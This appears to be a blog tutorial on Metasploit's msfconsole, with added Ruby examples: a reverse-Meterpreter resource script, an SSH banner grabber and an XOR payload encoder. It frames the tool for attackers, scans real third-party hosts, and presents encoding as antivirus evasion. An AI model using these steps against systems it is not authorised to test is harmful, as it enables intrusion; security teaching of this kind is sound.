
9/1/13 Metasploit framework | kevin

kevinkien.blogspot.com/2013/04/metasploit-framework.html 1/12
12th April
I had a look around online. Vietnamese-language material on the Metasploit Framework is rather scarce, and what there is is incomplete. So I am writing up what I know, drawing on a few English-language sources. [The aim is to help newbies understand it better and to have an official write-up from vhb, rather than something taken from elsewhere. There was already an article by kakavn_85 leeched onto vhb, but it was quite sketchy, so I am rewriting it as this post.] Some parts are still unfinished. Anyone who knows the encoders and NOPs modules of the Metasploit Framework well, please PM me on Yahoo at icarus_ken so we can write those two parts up in more detail together.
-The Metasploit Framework is an open-source framework built to deliver shellcode (payloads) against vulnerable machines. Alongside a number of other security tools, Metasploit ships a database of exploits for operating systems, programs and services (well over a thousand) and of payloads (several hundred). New exploits are added continuously as the project develops, so the toolkit keeps growing more powerful.
-The Metasploit Framework was created for security testing (pentesting), but for attackers like us it is a genuinely useful tool as well (for testing, exploiting bugs, running exploits). In my view, anyone who wants to become a hacker (or even just a script kiddie) should spend the time to study it properly.
-Briefly: the Metasploit Framework is one part of the Metasploit project. It was originally written in Perl and later rewritten in Ruby (more precisely, it is mainly Ruby).
The Metasploit Framework offers several user interfaces:
-Console interface: msfconsole. Most work is done here, on the command line.
-GUI: Armitage, a graphical front end.
-Command line interface: msfcli, for running a single module straight from the shell. (msfcli has since been removed from the framework; the same job is done today with msfconsole -x "commands".)
We will mostly work in msfconsole (it also looks more professional).
msfconsole has many commands and options. Below is an outline of the msfconsole commands covered here.
==========================
1 back
2 check
3 connect
4 info
5 irb
6 jobs
7 load
7.1 loadpath
7.2 unload
8 resource
9 route
10 search
10.1 help
10.2 name
10.3 path
10.4 platform
10.5 type
10.6 author
10.7 multiple
11 sessions
12 set
12.1 unset
13 setg
14 show
14.1 auxiliary
14.2 exploits
14.3 payloads
14.3.1 payloads
14.3.2 options
14.3.3 targets
14.3.4 advanced
14.4 encoders
14.5 nops
15 use
=======================
I will go through these commands briefly.
+back: use this command to leave the module you selected once you are done with it, or when you want to move on to another module. Of course you can also select another module directly with use, without leaving first.
Example:
msf payload(reverse_http) > back
msf >
+check: this command tests whether the exploit is configured correctly and whether the target is vulnerable, and reports the result without actually running the exploit. Not every exploit supports it.
+connect: this command is like a miniature netcat built into Metasploit, with support for SSL, proxies, pivoting and so on. By giving connect an IP address and a port, we can connect to a host from inside Metasploit just as we would with netcat or telnet.
For example:
msf > connect 118.69.228.254 22
[*] Connected to 118.69.228.254:22
SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
+info: this command shows detailed information about a module (an exploit, for example): the basic facts about it, including the options it needs and so on.
[screenshot: http://2.bp.blogspot.com/-50xmaYpI_nA/UV88tuiFvWI/AAAAAAAAAiU/bNtkluHV_a8/s1600/6.png]
+irb: this command drops us into a Ruby shell inside the framework.
Example:
msf > irb
[*] Starting IRB shell...
>> puts "welcome to vhbfamily"
welcome to vhbfamily
=> nil
+jobs: this command lists the modules currently running in the background.
Example:
msf > jobs
Jobs
====
No active jobs.
msf > jobs -h
Usage: jobs [options]
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs.
-h Help banner.
-i <opt> Lists detailed information about a running job.
-k <opt> Terminate the specified job name.
-l List all running jobs.
-v Print more detailed info. Use with -i and -l
+load: this command loads a plugin from Metasploit's plugins directory.
Example: list the available plugins and load one of them, then unload the plugin we just loaded. (cd is a built-in console command; ls is not, so msfconsole passes it through to the system shell, hence the "exec: ls" line.)
msf > cd /opt/metasploit/msf3/plugins/
msf > ls
[*] exec: ls
alias.rb
auto_add_route.rb
db_credcollect.rb
db_tracker.rb
editor.rb
event_tester.rb
ffautoregen.rb
ips_filter.rb
lab.rb
msfd.rb
msgrpc.rb
nessus.rb
nexpose.rb
openvas.rb
pcap_log.rb
sample.rb
session_tagger.rb
socket_logger.rb
sounds.rb
thread.rb
token_adduser.rb
token_hunter.rb
wmap.rb
msf > load alias.rb
[*] Successfully loaded plugin: alias
msf > unload alias.rb
+search: this command finds exploits, auxiliary modules, encoders and so on. It also supports a set of keywords that narrow the search:
Keywords:
name : Modules with a matching descriptive name
path : Modules with a matching path or reference name
platform : Modules affecting this platform
port : Modules with a matching remote port
type : Modules of a specific type (exploit, auxiliary, or post)
app : Modules that are client or server attacks
author : Modules written by this author
cve : Modules with a matching CVE ID
bid : Modules with a matching Bugtraq ID
osvdb : Modules with a matching OSVDB ID
edb : Modules with a matching Exploit-DB ID
For example:
search cve:2009 type:exploit app:client
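To make the keyword semantics concrete, here is a small Ruby model of how a search like the one above narrows the module list. This is an added example, not Metasploit's own code: it reproduces the behaviour described by the keyword list (every keyword must match; a keyword given several times matches if any of its values does; a bare word is looked up in the module name and path) against a constructed catalogue. The first four module paths in the catalogue are real Metasploit modules (their names are abbreviated); the last one is a placeholder, and its CVE number is not a real CVE.

```ruby
# Added example: a model of msfconsole's `search` keyword filter, written for
# this post.  Not Metasploit's code.  Catalogue entries are constructed; the
# first four paths are real module paths, the last is a placeholder.
CATALOGUE = [
  { path: 'exploit/multi/browser/java_signed_applet', type: 'exploit',
    name: 'Java Signed Applet Social Engineering Code Execution',
    platform: %w[java windows linux osx], app: 'client', cve: [], port: nil },
  { path: 'exploit/windows/smb/ms08_067_netapi', type: 'exploit',
    name: 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
    platform: %w[windows], app: 'server', cve: ['2008-4250'], port: 445 },
  { path: 'auxiliary/scanner/ssh/ssh_version', type: 'auxiliary',
    name: 'SSH Version Scanner', platform: [], app: nil, cve: [], port: 22 },
  { path: 'post/windows/manage/add_user_domain', type: 'post',
    name: 'Windows Manage Add User to Domain', platform: %w[windows],
    app: nil, cve: [], port: nil },
  { path: 'exploit/windows/browser/constructed_demo', type: 'exploit',
    name: 'Constructed client-side demo module (placeholder)',
    platform: %w[windows], app: 'client', cve: ['2009-0000'], port: nil },
]

# "cve:2009 type:exploit app:client" -> {"cve"=>["2009"], "type"=>["exploit"], ...}
# Bare words (no "keyword:") are collected under "text".
def parse_query(query)
  terms = Hash.new { |h, k| h[k] = [] }
  query.split.each do |token|
    key, value = token.split(':', 2)
    if value
      terms[key.downcase] << value.downcase
    else
      terms['text'] << key.downcase
    end
  end
  terms
end

# Does one module satisfy one keyword/value pair?
def field_matches?(mod, key, value)
  case key
  when 'text'     then mod[:name].downcase.include?(value) || mod[:path].include?(value)
  when 'name'     then mod[:name].downcase.include?(value)
  when 'path'     then mod[:path].include?(value)
  when 'type'     then mod[:type] == value
  when 'platform' then mod[:platform].include?(value)
  when 'app'      then mod[:app] == value
  when 'cve'      then mod[:cve].any? { |c| c.include?(value) }
  when 'port'     then mod[:port].to_s == value
  else false # unknown keyword: matches nothing
  end
end

# AND across keywords, OR within a repeated keyword.  Returns module paths.
def search_modules(query, catalogue = CATALOGUE)
  terms = parse_query(query)
  catalogue.select do |mod|
    terms.all? { |key, values| values.any? { |v| field_matches?(mod, key, v) } }
  end.map { |mod| mod[:path] }
end

if $PROGRAM_NAME == __FILE__
  %w[ssh port:445 type:exploit\ platform:windows].each do |q|
    puts "#{q}: #{search_modules(q).join(', ')}"
  end
  puts search_modules('cve:2009 type:exploit app:client').inspect
end
```

Compare `search_modules('type:exploit platform:windows')`, which requires both, with `search_modules('type:auxiliary type:post')`, which returns either type: that difference is why a long search line with several distinct keywords gets narrower while repeating one keyword gets wider.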
+sessions: this command lists the sessions that currently exist; a session may be a shell session, a Meterpreter session, and so on.
+set: this command sets a module option (this is how exploits are configured, and you will use it constantly). unset does the opposite.
+setg: when attacking one target or several, we may use one exploit or sometimes many. Some options would have to be set over and over with a plain set. If we give those options global scope instead, the repetition goes away: they apply to every exploit and auxiliary module. That is what setg (global set) does; unsetg removes one again. To keep this configuration for the next session, use the "save" command.
+show: this command displays different things depending on the argument that follows it. "show all" lists every module in the Metasploit Framework; "show exploits" lists only the exploit modules, and likewise for the other module types. show also displays the parameters of the current module (show options).
+use: this command selects a module (an exploit, an auxiliary module, ...) to work with.
Using Metasploit follows a general pattern:
Choose an attack module (usually an Exploit or an Auxiliary module; the other module types exist to support these two).
You can run "show all" to list every module.
To list the exploits, auxiliary modules, payloads, ... of one particular module type, run "show module_type", for example show exploits, show encoders, show payloads, show nops....
The diagram below gives a clearer picture of the framework's structure.
[screenshot: http://1.bp.blogspot.com/-sgnrfzjYWRI/UV6k-sraWOI/AAAAAAAAAhU/KWg_5PsRYtM/s400/1.png]
REX: the Ruby library for security-related tasks (sockets, protocols, text manipulation).
Framework Core: provides the interfaces for running modules and plugins.
MSF Base: a friendlier layer over the core for interacting with the framework's modules.
Exploit Modules.
First choose an exploit. To see the choices, run "show exploits", which lists every exploit the Metasploit Framework supports.
To use an exploit, run "use exploit_name", where exploit_name is the name of an exploit Metasploit provides. For more information about the exploit you picked, run "info exploit_name".
For example, to select the exploit used further down in this post:
use exploit/multi/browser/java_signed_applet
(Note that windows/manage/add_user_domain, which also shows up in "show all", is a post-exploitation module, post/windows/manage/add_user_domain, not an exploit; it is selected the same way with use, but the exploit steps below do not apply to it.)
Once an exploit has been selected with use, the next step is to configure the options it requires. (To see exactly what this exploit needs configured, and how, run "show options".)
show options usually prints a table with these columns:
Name-----Current Setting-------Required---------Description
If the Required column says "yes", you must set a value for that parameter; if it says "no", set it if you want to, and nothing breaks if you do not. The important thing is to check whether the defaults already filled in are appropriate for our situation. (There are further options beyond these; use "show advanced" and "show evasion" to see them.)
After configuring, we should verify that the configuration is right.
To do that we run "check", which tests whether the target can be attacked. This is a quick way to see both whether the options set with set are correct and whether the target really has the exploitable vulnerability. Not every exploit can actually be tested with check, though; sometimes you only find out by running the exploit.
* Choosing the target environment.
Many exploits only work against a specific environment, not against every one. So we run "show targets" to see which environments the exploit can run against.
For example:
exploit(java_signed_applet) > show targets
Exploit targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Linux x86 (Native Payload)
3 Mac OS X PPC (Native Payload)
4 Mac OS X x86 (Native Payload)
This shows the list of environments the exploit works against.
To select one, run "set TARGET target_number", where target_number is the Id from the list. What happens if you do not choose a target? The exploit picks a default during exploitation, and in practice the default is not always what you want, so selecting by hand is best. (Of course, fingerprint the OS first.)
* Choosing the payload (Selecting the Payload).
First, what is a payload? Think of it as something like the more familiar term trojan: a piece of code that runs on the victim's machine to carry out some action or to connect back to the attacker's machine. So how does the payload get onto the victim's machine? Two main methods are used (the classification is rough; which one applies depends on the case). The first is to deliver it by abusing a bug or vulnerability in the victim's system: break in through it and drop the payload on the victim. The second is to send it to the victim directly and wait for them to run it (that is social engineering).
To display the payloads compatible with the exploit we are currently using, run "show payloads". Three payloads as an illustration:
windows/dllinject/bind_nonx_tcp - normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp - normal Reflective DLL Injection, Bind TCP Stager
windows/meterpreter/reverse_http - normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
As you can see there are many payloads: a different payload for each OS, different techniques, different transport protocols.... Broadly, payloads fall into two basic kinds, bind payloads and reverse payloads, and which one to use matters. If your machine (the attacker) is behind a firewall or NAT and cannot accept inbound connections, use a bind payload: it opens a port on the victim and the attacker connects directly to the victim. If instead the victim is behind a firewall and we are not, use a reverse payload, which connects back from the victim to us (the attacker). So when attacking a target you must understand it first: scan, gather all the information you can, and choose the approach based on that.
When you have decided on a payload, run "set PAYLOAD payload_name" to select it.
Say we want the payload windows/meterpreter/reverse_ord_tcp; we type:
set PAYLOAD windows/meterpreter/reverse_ord_tcp
and get back: PAYLOAD => windows/meterpreter/reverse_ord_tcp
As before, to see the payload's details and options we can use "show options", "info payload_name", "show advanced", "show evasion"...
Once more: the payload you pick must match the target environment selected above. If the target is Linux and you use a Windows payload, it is over before it starts.
When all the settings are done, run "exploit" and see the result.
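The whole sequence above (use, show options, set, TARGET, PAYLOAD, exploit) is what you would put in an msfconsole resource script to run it unattended. The following is an added example written for this post, not code from Metasploit or from this blog: it parses a `show options` table by its column positions, applies our settings, refuses to continue while a required option is still empty or while the payload comes from the wrong platform branch for the chosen target, and only then emits the resource script (feed it to msfconsole with -r). The options table is constructed: it follows the column layout msfconsole prints, but the rows are not the module's real defaults. The target list is the java_signed_applet list shown above; the payload-prefix mapping (windows/, linux/, osx/, java/) reflects how the payload tree is organised; the addresses are from the 192.0.2.0/24 documentation range.

```ruby
# Added example for this post; not Metasploit code.  Turns the manual
# exploit workflow into a checked msfconsole resource script.

# Constructed `show options` output (layout real, values not the module's).
OPTIONS_TABLE = <<~TABLE
Module options (exploit/multi/browser/java_signed_applet):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   APPLETNAME  SiteLoader       yes       The main applet's class name
   CERTCN      SiteLoader       yes       The CN= value for the certificate
   SRVHOST                      yes       The local host to listen on
   SRVPORT     8080             yes       The local port to listen on
   SSL         false            no        Negotiate SSL for incoming connections
   URIPATH                      no        The URI to use (default is random)
TABLE

# `show targets` for java_signed_applet, as listed earlier in the post.
TARGETS = {
  0 => 'Generic (Java Payload)',
  1 => 'Windows x86 (Native Payload)',
  2 => 'Linux x86 (Native Payload)',
  3 => 'Mac OS X PPC (Native Payload)',
  4 => 'Mac OS X x86 (Native Payload)',
}

# The payload tree is organised by platform; a payload must come from the
# branch matching the target family.
TARGET_PAYLOAD_PREFIX = {
  'Generic (Java Payload)' => 'java/',
  'Windows'                => 'windows/',
  'Linux'                  => 'linux/',
  'Mac OS X'               => 'osx/',
}

# Parse the Name / Current Setting / Required / Description table using the
# column offsets of its header line.  Returns {name => {current:, required:}}.
def parse_options(table)
  cols = nil
  table.each_line.with_object({}) do |line, opts|
    if line =~ /^\s*Name\s+Current Setting\s+Required\s+Description/
      cols = { cur: line.index('Current Setting'), req: line.index('Required'),
               desc: line.index('Description') }
      next
    end
    next if cols.nil? || line.strip.empty? || line =~ /^\s*-+\s/
    opts[line[0, cols[:cur]].strip] = {
      current:  line[cols[:cur]...cols[:req]].to_s.strip,
      required: line[cols[:req]...cols[:desc]].to_s.strip == 'yes',
    }
  end
end

# Required options that still have no value.
def unset_required(opts)
  opts.select { |_, o| o[:required] && o[:current].empty? }.keys
end

def payload_fits_target?(target_id, payload)
  target_name = TARGETS[target_id].to_s
  family, prefix = TARGET_PAYLOAD_PREFIX.find { |name, _| target_name.start_with?(name) }
  !family.nil? && payload.start_with?(prefix)
end

# Merge settings into the parsed table, validate, emit the script.  Raises
# ArgumentError rather than producing a script msfconsole would reject or
# one that would fire the wrong payload.
def build_resource_script(module_path, table, settings)
  opts = parse_options(table)
  settings.each { |name, value| (opts[name] ||= { required: false })[:current] = value.to_s }

  missing = unset_required(opts)
  raise ArgumentError, "required options still unset: #{missing.join(', ')}" unless missing.empty?

  target  = Integer(opts.fetch('TARGET', { current: '0' })[:current])
  payload = opts.fetch('PAYLOAD') { raise ArgumentError, 'no PAYLOAD chosen' }[:current]
  unless payload_fits_target?(target, payload)
    raise ArgumentError, "payload #{payload} does not fit target #{target} (#{TARGETS[target]})"
  end

  lines  = ["use #{module_path}"]
  lines += settings.map { |name, value| "set #{name} #{value}" }
  lines += ['show options', 'exploit -j'] # -j: run the listener as a background job (see `jobs`)
  lines.join("\n") + "\n"
end

# Constructed settings (192.0.2.0/24 is the documentation range).
SETTINGS = {
  'SRVHOST' => '192.0.2.10', 'SRVPORT' => 8080,
  'TARGET'  => 1, 'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
  'LHOST'   => '192.0.2.10', 'LPORT' => 4444,
}

if $PROGRAM_NAME == __FILE__
  puts build_resource_script('exploit/multi/browser/java_signed_applet', OPTIONS_TABLE, SETTINGS)
end
```

Dropping SRVHOST from SETTINGS makes the script refuse to build (the table leaves it required and empty), and changing TARGET to 2 with the same Windows payload is rejected before anything is written: the two mistakes the text above warns about.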
MODULE AUXILIARY:
Auxiliary modules add functionality for penetration testing and vulnerability scanning, plus automated tasks.
Categories within the auxiliary modules:
-protocol scanners (SMB, HTTP, ...)
-port scanners
-Wireless
-IPv6
-DoS
-Server modules
-administrative access exploitation modules
As an example, a scan of the SSH service. The auxiliary modules cover a good range of services; "show auxiliary" prints a very long list. (To find exploits or auxiliary modules faster we use the search command; you cannot remember them all, and hunting through the full listing is tiring. For instance, to look for SSH scanning, run "search ssh".)
[screenshot: http://3.bp.blogspot.com/-AK2aNsM3ihk/UV7rQ9nCAlI/AAAAAAAAAhk/d0rqyNxVXz4/s400/2.png]
Note that in scanner auxiliary modules the remote host is set with "set RHOSTS" (it accepts a range or list of hosts), not "set RHOST" as in exploit modules.
In the example we scanned the SSH version of the server 118.69.228.254. I left the remaining parameters at their defaults.
Port scanning example: I scan which sites on the server hosting kmasecurity.net have TCP ports 443 (https) and 80 open.
[screenshot: http://2.bp.blogspot.com/-oH32QBtUOJo/UV7u6GuTl7I/AAAAAAAAAhs/3BoYmgScwoo/s1600/3.png]
In short, using an auxiliary module takes three basic steps: choose the auxiliary module, set the options it needs, and finally run it with "run". Knowing the available auxiliary modules well is valuable; it makes us more flexible when going after a particular target.
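What the SSH version scan above actually does on the wire is the same thing the `connect 118.69.228.254 22` transcript showed earlier: connect, read the server's identification line, parse it, repeat for every host in RHOSTS. The following is an added example written for this post (not code from Metasploit or from the blog) that does this by hand. The servers it scans are constructed: local listeners that replay a fixed banner, one of them the banner seen earlier in this post and one that is not SSH at all, so it runs offline and against nothing you do not own.

```ruby
require 'socket'
require 'timeout'

# Added example for this post; not Metasploit code.  A minimal version of
# what auxiliary/scanner/ssh/ssh_version does per host: read the SSH
# identification string "SSH-protoversion-softwareversion SP comments"
# (RFC 4253, section 4.2) and split it into its parts.
SSH_ID_RE = /\ASSH-(?<proto>[0-9.]+)-(?<software>\S+)(?: (?<comments>.*))?\z/

# Returns {proto:, software:, comments:} or nil when the line is not SSH.
def parse_ssh_banner(line)
  m = SSH_ID_RE.match(line.to_s.chomp)
  return nil unless m
  { proto: m[:proto], software: m[:software], comments: m[:comments] }
end

# One host: connect, read a single line, parse it.  Refused connections,
# silent services and non-SSH banners all come back as nil.
def grab_ssh_banner(host, port, timeout = 3)
  Timeout.timeout(timeout) do
    TCPSocket.open(host, port) { |sock| parse_ssh_banner(sock.gets) }
  end
rescue Timeout::Error, SystemCallError
  nil
end

# The RHOSTS loop: [[host, port], ...] -> [[host, port, banner_or_nil], ...]
def scan_ssh(targets)
  targets.map { |host, port| [host, port, grab_ssh_banner(host, port)] }
end

# Constructed fake service for the demonstration: listens on an ephemeral
# loopback port, sends the banner to each client and hangs up.  Returns the port.
def fake_service(banner)
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    loop do
      client = server.accept
      client.write(banner)
      client.close
    end
  end
  server.addr[1]
end

if $PROGRAM_NAME == __FILE__
  targets = [
    ['127.0.0.1', fake_service("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")], # banner from this post
    ['127.0.0.1', fake_service("HTTP/1.0 400 Bad Request\r\n")],              # not SSH
  ]
  scan_ssh(targets).each do |host, port, b|
    puts b ? "#{host}:#{port}  SSH #{b[:proto]}  #{b[:software]}  #{b[:comments]}" : "#{host}:#{port}  not SSH"
  end
end
```

The timeout matters in a real sweep: a filtered port that never answers would otherwise stall the whole RHOSTS loop on one host, which is also why the scanner modules expose a ConnectTimeout option.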
Common commands when a payload module is selected:
generate: generate the payload.
pry: open a pry session (an alternative to Ruby's standard IRB shell) in the current module.
reload: reload the current module.
Module Payloads: as noted above, a payload is shellcode. The Metasploit Framework provides a large number of payloads.
I touched on payloads above, so everyone should by now have a picture of what a payload is. In this part I say a bit more about the payload modules.
Run "show payloads" to list the payloads in Metasploit.
To learn more about these commands, use the -h (--help) flag, then set the appropriate values. An illustration:
[screenshot: http://4.bp.blogspot.com/-DE4TecBcEOk/UV8EheGwc7I/AAAAAAAAAh8/cE01Yq7-ezw/s1600/4.png]
[screenshot: http://2.bp.blogspot.com/-hpCBTVMdlTo/UV8Euj8-OMI/AAAAAAAAAiE/YeI6tUtKoYM/s1600/5.png]
As you can see, the -E option forces the payload to be encoded, which is meant to improve its chances of getting past antivirus.
If you do not choose anything, simply typing "generate" is enough.
Encoding transforms the payload's bytes so that the byte values the exploit cannot deliver ("bad characters" such as 0x00 or the newline bytes, given with generate -b) no longer appear in it, and prepends a small decoder stub that restores the original at run time. Because encoding also changes the payload's byte pattern it was pitched as an antivirus evasion step; in practice the decoder stubs of the stock encoders (shikata_ga_nai included) are well known to antivirus engines, so do not count on encoding alone to hide anything.
Naturally we can choose among the different encoders that Metasploit includes. To try different encodings of a payload, run "show encoders", which lists all the available encoders. To use a particular one, type "generate -e x86/shikata_ga_nai", where "x86/shikata_ga_nai" is one of the encoders in the encoders module.
The Metasploit Framework supports a large number of encoders, so pick one that suits your payload and target; it makes the attack more effective.
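To see what "encoding away the bad characters" means in bytes, here is a deliberately small encoder written for this post. It is an added example, not Metasploit's code and not shikata_ga_nai: the transform is a single-byte XOR, and the "decoder stub" is reduced to the key byte stored in front of the encoded body, so the whole round trip can be checked in Ruby rather than run as machine code. The payload bytes are constructed and execute nothing; the bad-character set is the classic `\x00\x0a\x0d` you would pass to `generate -b`.

```ruby
# Added example for this post; not Metasploit code.  A single-byte XOR
# "encoder" that picks a key so that no bad character survives in the
# output, plus the decode step a real stub would perform at run time.

BAD_CHARS = "\x00\x0a\x0d".b            # what `generate -b '\x00\x0a\x0d'` asks to avoid
# Constructed sample payload: deliberately contains NUL, LF and CR.
SAMPLE_PAYLOAD = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x00\x0a\x0d\xcc".b

def contains_bad_chars?(bytes, bad_chars = BAD_CHARS)
  (bytes.bytes & bad_chars.bytes).any?
end

# Try every single-byte key; keep the first one where neither the key
# itself (it becomes part of the output) nor any encoded byte is a bad char.
# Returns nil when no key works, which is when a real encoder has to switch
# technique (multi-byte XOR, additive feedback, ...).
def find_xor_key(payload, bad_chars = BAD_CHARS)
  bad = bad_chars.bytes
  (1..255).find do |key|
    !bad.include?(key) && payload.bytes.none? { |b| bad.include?(b ^ key) }
  end
end

# Encoded blob = [key] + (payload XOR key).
def xor_encode(payload, bad_chars = BAD_CHARS)
  key = find_xor_key(payload, bad_chars)
  raise ArgumentError, 'no single-byte XOR key avoids the bad chars' unless key
  ([key] + payload.bytes.map { |b| b ^ key }).pack('C*')
end

# What the decoder stub does on the target: recover the original bytes.
def xor_decode(blob)
  key, *body = blob.bytes
  body.map { |b| b ^ key }.pack('C*')
end

def hex(bytes)
  bytes.bytes.map { |b| format('\x%02x', b) }.join
end

if $PROGRAM_NAME == __FILE__
  encoded = xor_encode(SAMPLE_PAYLOAD)
  puts "raw:     #{hex(SAMPLE_PAYLOAD)}  bad chars: #{contains_bad_chars?(SAMPLE_PAYLOAD)}"
  puts "encoded: #{hex(encoded)}  bad chars: #{contains_bad_chars?(encoded)}"
  puts "decodes back: #{xor_decode(encoded) == SAMPLE_PAYLOAD}"
end
```

The failure path is worth noting: a payload that already uses every byte value cannot be XOR-encoded with one key against even a single bad character, because `b ^ key` hits that value for some byte. The stock encoders handle this with multi-byte and feedback schemes, which is also why their decoder stubs are large enough to be recognisable.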
Posted 12th April by lightning
Labels: ubuntu